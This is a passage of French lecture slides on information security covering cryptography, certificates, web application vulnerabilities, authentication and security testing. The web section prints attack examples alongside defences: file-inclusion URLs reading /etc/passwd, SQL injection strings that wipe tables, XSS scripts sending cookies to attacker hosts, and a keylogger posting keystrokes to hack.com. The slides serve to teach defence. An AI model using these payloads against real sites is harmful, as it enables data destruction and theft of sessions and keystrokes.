Le ”Hash” est utilisé pour garantir l’intégrité des données


Il permet de vérifier l’égalité d’un mot de passe, sans en
conserver l’original
Une petite modification du fichier original donne une grande
variation du Hash (généralement)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 226 / 351


Exemples de Hashage

Le crypt unix
”password” ==> ”5GKtdsqlkgy”
Le CRC (Compute Redondancy Check)
le sum unix
SHA-1 (Shamir)
MD5 (Rivest)
Blowfish

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 227 / 351


Hashage : utilisation pour les mots de passe

Génération :
Alice choisit son mot de passe M1
Le système ”hashe” M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK
Option : on peut ajouter un ”sel” pour complexifier le craquage
des mots de passe.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 228 / 351


Vocabulaire

Coder : rendre inintelligible une information à l’aide d’un code


Décoder : rendre intelligible une information préalablement
codée à l ’aide de la clé
Décrypter : décoder mais sans le code
Chiffrer=coder
Crypter : en théorie n’existe pas
Pour plus d’information :
http://michel.arboi.free.fr/cryptFAQ/

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 229 / 351


Pièges du chiffrement

Un chiffrement sans clé est un mauvais chiffrement


Un chiffrement ”fermé” est un mauvais chiffrement
Faire un bon chiffremernt est compliqué
Un bon chiffrement ”théorique”, s’il est mal appliqué devient
un mauvais code (exemple du chiffrement WEP pour le Wi-Fi)
Réutiliser une clé fragilise plus ou moins le processus de
chiffrement.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 230 / 351


Chiffrement symétrique

Les clés de chiffrement et de déchiffrement sont identiques


Les algorithmes de chiffrement et déchiffrement ne sont pas
forcément identiques.
Pour communiquer il faut que Alice et Bob soient tous les 2
au courant de la clé, ce qui signifie un échange préalable

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 231 / 351


Chiffrement symétrique

Alice

Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 232 / 351


Chiffrement symétrique : exemples

Exemples à transposition
Rotation 13 (code de César) => pas de clé
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits) , et triple DES (3DES)
IDEA
AES (actuel standard de l ’armée US)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 233 / 351


Chiffrement symétrique : caractéristiques

Les chiffrements et déchiffrements sont rapides


Leur décryptage peut être très long
64 bits = 8 octets = 1,8 x 1019 possibilités
à 1 million de tests par seconde
1,8 x 1013 secondes soit 5800 siècles
AES est disponible en version 128,192 et 256 bits

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 234 / 351


Chiffrement symétrique : DES

Ancien standard
56 bits (64 - 8 réservés à la parité)
version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 235 / 351


Chiffrement symétrique : AES

http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après
unconcours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128,192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 236 / 351


Chiffrement asymétrique

On génère 2 clés inter-dépendantes appelées


clé publique (qui a vocation à être largement distribuée)
clé privée (qui doit absolument être protégée)
Ce qui est chiffrée par l’une est déchiffrable par l’autre, et
uniquement elle !
Il est mathématiquement impossible, dans des temps
”humains” de déduire une clé depuis l’autre.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 237 / 351


Chiffrement asymétrique

Bob

Clé publique
de Bob
Génération Publication Alice
du bi-clé sur Internet
Clé privée Clé publique
de Bob de Bob

Algorithme Algorithme
de de
déchiffrement Message Message chiffrement
Message chiffré

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 238 / 351


Chiffrement asymétrique : avantages

La clé publique est... publique


On peut signer les messages avec ce chiffrement (cf la suite)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 239 / 351


Chiffrement asymétrique : inconvénients

Le chiffrement est moins résistant (2048 bits RSA = 128 bits


AES),
Il est plus sensible aux progrès mathématiques,
Il est beaucoup plus lent.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 240 / 351


Chiffrement asymétrique : exemples

Méthodes
R.S.A.
D.S.S./Diffie Helmann
El Gamal (logarithme discret)
Outils
PGP
GPG
Openssl

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 241 / 351


Chiffrement asymétrique : PGP

Pretty Good Privacy


Auteur : Phil R. Zimmermann
Basé sur RSA
Notion d’anneau de confiance
A l’origine du standard OpenPGP (RFC 2440)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 242 / 351


Chiffrement asymétrique : GPG

GNU Privacy Guard


Logiciel libre
Compatible avec PGP
http://www.hsc/ressources/breves/gpg.html

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 243 / 351


Chiffrement asymétrique : RSA

Auteurs : Rivest, Shamir et Ademan


Basé sur la factorisation de nombres premiers
Le plus connu des chiffrements asymétriques

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 244 / 351


Chiffrement : réalité

Chiffrement asymétrique est lent, et le chiffrement symétrique


inutilisable
D’où l ’idée
On échange des clés de session symétriques en les codant avec
un chiffrement asymétrique
Puis on décode en symétrique

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 245 / 351


Cassage de clé : en 1995

Qui budget Moyen Temps Coût Clé sûre


Hacker de passage 0,00 e ordinateur 1 semaine 45
Hacker de passage 400,00 e FPGA 5 heures 8 cents 50
Petite entreprise 10.000,00 e FPGA 12 minutes 55
Service moyen 300.000,00 e FPGA 24 secondes 60
Grosse entreprise 10.000.000,00 e FPGA 0,7s 65
Grosse entreprise 10.000.000,00 e ASIC 5 ms 0,1 cents 70
NSA,DCRI,GRU 300.000.000,00 e ASIC 0,2ms 0,1 cents 75

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 246 / 351


Cassage de code : décryptage

La puissance processeur double tous les 18mois (loi de Moore)


Progrès mathématiques sur les chiffrements asymétriques :
rapidité doublée tous les 18 mois avec des sauts sporadiques
Budget d’un attaquant double tous les 10 ans
Actuellement (http://hashcat.net) pour une AMD 7970
8,5 milliards de MD5 par seconde
416 Millions de SHA512 par seconde
179 Millions de SHA-3 par seconde
141000 WPA2 par seconde

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 247 / 351


Cassage de clé : évolution

1982 1992 2002 2012 2022 2032


symétrique 56 64 72 80 87 95
RSA/log discret 417 682 1028 1464 1995 2629
DSS 102 114 127 141 154 168
Courbes elliptiques 135 149 164 179

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 248 / 351


Chiffrement asymétrique : Signature

La signature est la garantie


de l’identité de l’expéditeur du message
de l’intégrité du message
La procédure
On prend l’empreinte du message
On la code avec sa clé privée
On l’expédie
Le destinataire décode l’empreinte avec la clé publique et
compare les 2 empreintes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 249 / 351


Chiffrement asymétrique : Signature

Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé

Algorithme Algorithme Algorithme


de de de
hashage hashage déchiffrement

Clé privée
Hash Hash Hash déchiffré
de Bob

Algorithme
de Comparaison
chiffrement

Hash chiffré

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 250 / 351


Autorité de certification

A qui appartient la clé publique ?


Possibilité d’usurpation d’identité
Utilisateur
Machine
Problème de confiance
Notion de tiers de confiance
Notion d’autorité de certification

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 251 / 351


Autorité de certification : création

Une ”autorité de certification” est désignée ”d’un commun


accord” par sa communauté
Elle génère son bi-clé (couple clé publique/clé privée)
Elle génère un certificat auto-signé
Le certificat est délivré à chaque membre de la communauté.
Les membres l’intègrent dans les navigateurs.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 252 / 351


Autorité de certification : création

Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé

hashage MD5

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 253 / 351


Autorité de certification : certification

Un membre de la communauté crée son bi-clé


Il va auprès de l’Autorité d’enregistrement se faire reconnaı̂tre
et valider son certificat.
L’AE envoie la signature à l’AC
L’AC signe avec sa clé privée le certificat.
Le membre récupère le certificat et l’intègre dans son serveur.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 254 / 351


Autorité de certification : certification
BNP

Génération Publication web

Clé privée Clé publique


de BNP de BNP

Verisign

Vérification
identité

Clé publique
de BNP

Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 255 / 351


Autorité de certification : utilisation

L’utilisateur, membre de la communauté reçoit le certificat.


Il regarde dans le certificat l’AC.
Il la reconnaı̂t et regarde si la signature du certificat est exacte.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 256 / 351


Autorité de certification : chaı̂ne

Une AC peut-être membre d’une communauté avec elle-même


une AC
La vérification se répète :
Vérification du certificat (arrêt et validation si l’AC l’ayant
généré est reconnue)
Vérification du certificat de l’AC auprès de l’AC supérieure
(arrêt si celle-ci est reconnue).
Boucle jusqu’à
AC auto-certifiée (que l’utilisateur accepte ou non)
AC reconnue

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 257 / 351


Autorité de certification

Les navigateurs sont livrés avec des AC


Verisign
Comodo
etc..
Pas encore d’AC administrative française (En cours de
réflexion)
Les CRL

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 258 / 351


Preuve

Beaucoup de contraintes pour les signatures

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 259 / 351


Certificats : Une norme X509

Que contient un certificat ?


Une clé publique
Un identifiant (email ou nom de machine)
Un rôle (chiffrement, signature, AC)
Des renseignements administratifs

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 260 / 351


Certificats : Une norme X509

Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/emailAddress=server-certs@thawte.com
Validity
Not Before: Jul 9 16:04:02 1998 GMT
Not After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=www.freesoft.org/emailAddress=baccala@freesoft.org
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...
d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:
e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:
....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 261 / 351


URLographie

http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/
crypto.pdf
http://cr.yp.to/

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 262 / 351


Les applications web

Les failles d’un site web.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 263 / 351


Problème générique des failles

Les failles sont dues à l’utilisation imprévue d’une variable pour


obtenir un comportement inattendu, mais contrôlé, plus ou moins
correctement, par le pirate.
Contrairement à ce que montre le cinéma, les intrusions sont dûes
à plus de 90% à l’utilisation de failles de sécurité, et non à un
problème de mot de passe.
Les serveurs web étant souvent les seuls points accessibles, voyons
comment cela peut se passer.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 264 / 351


Structure d’un service web

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 265 / 351


20 points de vulnérabilités

Du schéma précédent, on peut trouver 20 points de vulnérabilités :


Les logiciels
Les serveurs
Les scripts
Les modules
Les outils de protection (antivirus, antispyware, etc.)
Les OS
Les matériels
Les communications
L’utilisateur
Les protocoles

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 266 / 351


Les types de paramètres

Variables GET. Elles sont données dans l’URL de demande.


Variables POST. Fournies par un formulaire.
Variables Cookies. Variables conservées par le navigateur sur
son disque dur et généralement fournies par le serveur.
Variables SERVER (HTTP USER AGENT ou
HTTP REFERER)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 267 / 351


Les variables GET

Décrites dans l’URL.


http://www.google.com/search?p=html&hl=fr.
Ici 2 variables p et hl, avec les valeurs html et fr.
Généralement provenant d’une interrogation directe.
Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire
(method=GET).

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 268 / 351


Les variables POST

Remplies par un formulaire.


Utilisées quand on a un grand volume de données à envoyer.
Utilisées quand on a un grand nombre de variables.
Non tracées par les journaux des daemons (hormis modules
spécifiques).
Traitement particulier des variables Hidden qui sont cachées
pour l’utilisateur, mais pas pour le navigateur.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 269 / 351


Les variables cookies

Notion de valise de variables stockées sur le client


Transmises de manière transparente dans la requête
C’est le serveur qui est sensé positionner ces variables pour
une durée limitée
Un serveur ne peut généralement (sauf faille de sécurité)
demander à accéder qu’aux variables :
Qu’il a lui-même positionnées.
Qu’une machine de son domaine a positionnées (et si celle-ci
l’a autorisé).

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 270 / 351


Les variables SERVER

Ces variables sont hétéroclites.


Celles que seul le serveur connait
Version du serveur
Répertoire de travail
Celles qui sont associées à la connexion
L’adresse du client REMOTE ADDR
L’hôte appelé
Le port source
Celles qui proviennent du client
Le Referer : HTTP REFERER
Le USER AGENT
L’URL appelée

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 271 / 351


MUV : principe fondamental

Ces variables proviennent en majorité du client.


Il a donc tout pouvoir pour les modifier, effacer.
Les contrôles Javascript sont exécutés par le client ( s’il le
souhaite ! ).
Les contrôles de formulaire (taille, type) sont exécutés par le
client ( s’il le souhaite ! ).

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 272 / 351


MUV : Généralisation : Injection de code

Faille de sécurité : faire exécuter du code informatique


Ce code va être injecté par une ”interface” pas prévue pour
Ce code dépend de qui va l’éxecuter et du vecteur d’injection

Nom Langage Vecteur Interpréteur/Victime


Buffer Overflow Assembleur Binaire Processeur
SQL Injection SQL web SGBD
LDAP Injection LDAP web annuaire LDAP
Injection shell, DOS, etc. web Interpréteur backoffice
XSS Javascript web navigateur
CSRF HTML web navigateur
script PDF Javascript PDF lecteur PDF

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 273 / 351


MUV : Quelques exemples

Variables sur les noms de fichier (ou les répertoires)


Variables dites superglobales
Variables dans les requêtes SQL (ou LDAP ou tout
interpréteur)
Variables pour du XSS

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 274 / 351


MUV : Sur les noms de fichiers

Exemple d’inclusion.
Soit le programme suivant
<?
include ("header.inc");
$page=$_GET[’page’];
include ($page);
include ("footer.inc");
?>
que l’on utilise de la manière suivante
Utilisation
http://192.168.30.72/mep.php?page=toto.txt

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 275 / 351


MUV : Sur les noms de fichiers

Quelques attaques :
Exemples simples d’utilisation malveillante
http://192.168.30.72/mep.php?page=/etc/passwd
http://192.168.30.72/mep.php?
page=http://cri.univ-tlse1.fr/creufophacker.inc

On pourrait de la même manière utiliser les fonctions fopen,


require, etc.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 276 / 351


MUV :Solution

Refuser les requêtes avec des caractères dangereux


<?
If (eregi("/",$page))
{die("Va jouer dans le mixer !")}
include ("header.inc");
include ($page);
include ("footer.inc");
?>
On peut aussi utiliser
La notion de safe-mode :
http://fr2.php.net/features.safe-mode
Empêcher l’utilisateur apache de sortir (avec un firewall en
sortie), on pourra aussi bloquer MySQL et proftpd.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 277 / 351


MUV : Les injections SQL (ou LDAP)

Le SQL est un langage d’interrogation de base de données. C’est


un véritable langage de programmation, avec ses fonctions, ses
variables, ses commentaires.
Le principe des appels SQL en WWW, est que le langage (PHP par
exemple) crée une chaine de caractères (la commande SQL) qui est
ensuite envoyée au SGBD.
Le SGBD interprète et exécute le programme envoyé.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 278 / 351


MUV : Les injections SQL ou LDAP

Utilisation
http://192.168.30.72/php/test.sql?id=3;

Code du programme
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 279 / 351


MUV : Les injections SQL première attaque

Les espaces doivent être remplacés par %20


http://192.168.30.72/php/test.sql?id=3 OR 1=1

ce qui nous donne


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1
Le résultat est la destruction de tous les enregistrements.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 280 / 351


MUV : Les injections SQL 1 bis

Code du programme
<?
$sql_query="DELETE FROM matable \
WHERE id=$id AND champ1=true";
mysql_connect($database);
mysql_query($database,$sql_query);
?>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 281 / 351


MUV : Les injections SQL attaque 1bis

On ajoute un commentaire
http://192.168.30.72/php/test.sql?id=3 OR 1=1 - -

ce qui nous donne :


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1 - - \
AND champ1=true

Le résultat est la destruction de tous les enregistrements, car la fin


du WHERE n’est pas prise en compte.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 282 / 351


MUV : Les injections SQL première solution

La première solution peut consister à modifier le programme en


ajoutant des quotes
Code du programme
$sql_query="DELETE FROM matable WHERE id=’$id’";

Le résultat de la première attaque devient alors


Code du programme
DELETE FROM matable WHERE id=’3 OR 1=1’
qui est sans danger.
Mais pourtant une faille existe encore

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 283 / 351


MUV : Les injections SQL deuxième attaque

Insérons une quote


http://192.168.30.72/php/test.sql?id=3’ OR 1=1 - -

ce qui nous donne


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3’ OR 1=1 - - ’
Le résultat est encore la destruction de tous les enregistrements.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 284 / 351


MUV : Les injections SQL deuxième solution

La solution va passer par 2 possibilités


le magic quotes gpc à on (ATTENTION : les versions de PHP
infuent !)
la fonction addslashes (idem)

Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";

L’attaque précédente donne alors


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3\’ OR 1=1’

Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 285 / 351


MUV : Les injections SQL troisième attaque

Le but de magic quotes gpc est à ON. Mais il a des problèmes


avec les caractères dits ”multibytes” : c’est à dire les alphabets plus
complexes (chinois par exemple)
A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .
Cela ne peut réellement se faire que par un script :
Parlons chinois
$id=chr(0xbf).chr(0x27)." OR 1=1";
fopen(http://192.168.30.72/php/test.sql?id=$id)";

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 286 / 351


MUV : Les injections SQL troisième attaque

Le PHP reçoit un caractère multibyte chinois 0xbf27


Il l’envoie à addslashes (ou à magic quotes gpc, ce qui est
identique)
Celui-ci ne comprenant pas que c’est un caractère multibytes,
croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Il
ajoute à 0x27 un antislash (0x5c).
La chaine renvoyée à PHP est donc 0xbf5c27.
Comme PHP renvoie à MySQL qui lui comprend le multibyte
(si la BD est en UTF8), et que 0xbf5c est un caractère
valide, il nous reste 0x27 qui est... la quote.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 287 / 351


MUV : Les injections SQL troisième attaque

On obtient alors la chaine suivante :


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3 ’ OR 1=1’
Le résultat est encore la destruction de tous les enregistrements.
Solution : mysql real escape().

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 288 / 351


Et si c’était possible ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 289 / 351


MUV : Les variables de session

Les variables de session permettent de mettre les variables


habituellement mises en cookies, uniquement sur le serveur
Cela évite de trimbaler beaucoup d’informations.
On n’a plus à les contrôler à chaque fois (elles ne sont plus
modifiables).
Seule reste une variable dans le cookie : celle qui contient le
numéro de session. En général, cette variable est équivalente à un
identifiant (on ne réauthentifie plus la personne).
Pour un pirate, c’est le cookie à obtenir.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 290 / 351


MUV : Voler un cookie : Attaque

Soit un forum avec une zone de texte quelconque.


Si on saisit
Salut les potes, le cours est génial, le prof est <B>super</B>.
Reviendez....
On obtient donc
Salut les potes, le cours est génial, le prof est super.
Reviendez....

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 291 / 351


MUV : Voler un cookie : Problème

Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 292 / 351


MUV : Voler un cookie : Problème

Soyons plus méchant :


Récupérons le cookie
<script>
cookie=document.cookie();
i=new image();
i.src="http://www.pirate.com/?id="+cookie;
</script>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 293 / 351


MUV : Voler un cookie : Solution

Bloquer la chaine ”<script” dans les messages.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 294 / 351


MUV : Voler un cookie : Vraiment la solution ?

Comment s’écrit script ?


”<script”
”<javascript”
”<JAVAscript”
”<java script”
”<java
script
et ça ?
<&#00015;&#099;&#00015;&#x72;&#0000105;&#x070;&#x0074;>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 295 / 351


MUV : Pire encore ?

un javascript s’appelle aussi par


Par erreur
<img src=Y > =’http ://pir.com/vol ?ck=’+document.cookie”>

Spécifique IE
<bgsound Javascript”>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 296 / 351


MUV : XSS = vol de cookie ?

Ce n’est qu’une possibilité, par la transformation du navigateur.


Mais en quoi ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 297 / 351


Vous me connaissez ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 298 / 351


Et moi ?

<script language="javascript">
var keys=’’;
document. {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;
keys = ’’;
}, 1000);
</script>

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 299 / 351


Et si on intégrait tout ça ?

http://www.beefproject.com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 300 / 351


Un constat difficile

Un constat
beaucoup d’applications sont livrées ”telles quelles”
il y a souvent un historique lourd
les applications sont ”mouvantes”.
les développeurs ne sont pas souvent formés.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 301 / 351


Des solutions globales

D’où des solutions ”globales”


des IPS réseau pour bloquer
des modules de sécurité
en négatif : mod security (apache)
en positif : naxsi (nginx)
parfois directement sur le serveur à protéger
souvent utilisés en reverse-proxy.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 302 / 351


MUV : Pour en savoir plus

http://ha.ckers.org/xss.html
http://sla.ckers.org/forum/list.php?2

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
http://www.php-ids.org/

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 303 / 351


L’authentification

Différence identification et authentification


Multi-facteurs ou pas
Sur quels périmètres
Accès aux machines
Accès aux applications
Accès au réseau
SSO : Same Sign On ou Single Sign On ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 304 / 351


Méthodes d’authentification

Locale (Fichiers, SQL)


Radius (historique, multiprotocoles, AAA)
LDAP et Active Directory (parfois en backend)
Kerberos (SSO général, mal implémenté par Microsoft)
SSO Web Intra-organisation (CAS)
SSO Trans-organisations (Shibboleth, Oauth)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 305 / 351


Les mécanismes physiques

Ce que l’on a
FIDO et Yubikey
RSA SecurID
Ce que l’on est
lecture d’empreintes digitales (ou de carte veineuse)
lecture d’iris de l’oeil
reconnaissance du visage
vitesse de frappe sur les touches

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 306 / 351


Vérifier sa sécurité

Vérifier sa sécurité.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 307 / 351


Vérifier sa sécurité

Etre persuadé que sa sécurité est efficace n’est pas suffisant : il


faut à minima vérifier que cela correspond à la réalité.
Vérifier que les outils de sécurité sont actifs
Vérifier que les procédures de sécurité sont suivies
Permettre aux utilisateurs de découvrir leurs outils de sécurité
Vérifier notre e-réputation
Faire tester sa sécurité.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 308 / 351


Vérifier que les outils de sécurité sont actifs

Vérifier les antivirus grâce http://eicar.com.


Déclenchent-ils des alertes sur le poste ?
sur le serveur de messagerie ?
sur le proxy web ?
Vérifier les ports ouverts grâce à ShieldUp de grc.com
Vérifier le niveau de chiffrement avec sslabs.com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 309 / 351


Vérifier que les procédures sont actives

Les antivirus sont-ils à jour ? Comment le voit-on ?


Les infections virales remontent-elles sur la console centrale ?
Y-a-t-il des remontées d’alarmes (syslog par exemple) en cas
de problème ?
Les filtres d’url fonctionnent-ils ?
Les vérifications de procédures sont-elles régulières et
automatiques ?
etc.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 310 / 351


Aider les utilisateurs à vérifier leur sécurité

Pourquoi ?
Leur montrer comment réagissent leurs outils de sécurité (et
ainsi éviter les ”fake”).
Leur faire prendre conscience de la sécurité,
Les rendre autonomes,
Les rendre ”détecteurs d’incident”.
Comment ?
Déclencher une alerte avec http://eicar.com pour l’antivirus
Tester le firewall local avec grc.com
Voir le repérage des spams, phishing, etc.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 311 / 351


Vérifier son e-réputation

Pourquoi ?
Parce que c’est une valeur importante de l’entreprise,
Parce ce que cela peut faciliter ou compliquer voire interdire la
communication avec les clients.
Comment ?
Voir la réputation mail avec
mxtoolbox pour savoir si l’on est blacklisté
backscatter pour repérer nos refus de mails fautifs
chez CISCO
Voir la réputation web avec
chez McAfee
Avons nous une zone DNS propre ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 312 / 351


Les moteurs de recherche

Comment nous voit les moteurs de recherche et Internet ?


Google repère-t-il des .bak, .tmp, etc. chez nous ?
Quels sont les mots-clés associés à notre domaine ?
Peut-on trouver des failles de sécurité associées à nos sites
web ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 313 / 351


Faire tester sa sécurité

Mais tester soi-même n’est pas toujours suffisant : des entreprises


spécialisées sont là pour cela.
Ce sont des experts (souvent),
Ils ont les outils pour (et le droit de les utiliser),
Ils délivrent des rapports lisibles,
Ils savent ce qu’ils ont le droit de faire.
Règles chez Amazon

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 314 / 351


Faire tester sa sécurité

Mais attention :
Vérifiez que vous avez le droit de tester (serveur mutualisé ou
hébergé),
Vérifiez la compétence (réputation, autres clients, etc.),
Ne pas choisir l’option ”je paye uniquement si vous trouvez”
(les 0days s’achètent ! ! !)
Définissez bien le périmètre (géographique, opérationnel,
temporel etc.),
TEST = RISQUE,
Plus vous en savez, mieux vous serez servis.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 315 / 351


Les sujets non traités

Par manque de temps, ces sujets n’ont pas été traités. Ils sont
indiqués afin que vous puissiez vous renseigner dessus.
Les VPN (IPSEC, VPN-SSL, openvpn)
La sécurisation d’une structure AD
La sécurisation des accès (filaire ou wifi)
Les portails captifs (et leurs limites avec le HTTPS)
Le 802.1x (avec le protocole EAP et surtout PEAP)
La gestion des spams
La gestion du phishing
Habituer ses utilisateurs
Limiter les dégâts (détection de l’origine des connexions)
La lutte antivirale
Les limites des antivirus
La détection et le blocage post-infection (DNS, Squidguard)
Le DNS RPZ (DNS Menteur)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 316 / 351


Les normes sécurité

Les normes de sécurité

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 317 / 351


Les normes sécurité

Pourquoi ?
Besoin de définir des bonnes pratiques (pas de notion
d’absolu !)
Besoin de parler de la même chose
Besoin de certification (évaluation) commune
Evaluation des hommes (pour le recrutement)
Evaluation des entreprises (pour la publicité, ou les cercles de
confiance)
Appliquer à la sécurité les principes de la qualité

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 318 / 351


La qualité

C’est quoi ?
Tradition anglo-saxonne
Objectif : s’améliorer, RIEN DE PLUS
Roue de deming (PDCA)
Plan : je prévois ce que je vais faire
Do : je fais ce que j’ai prévu
Check : je vérifie (mesure) que j’ai fait ce que j’ai prévu
Act : je constate ce qui n’a pas marché pour le corriger
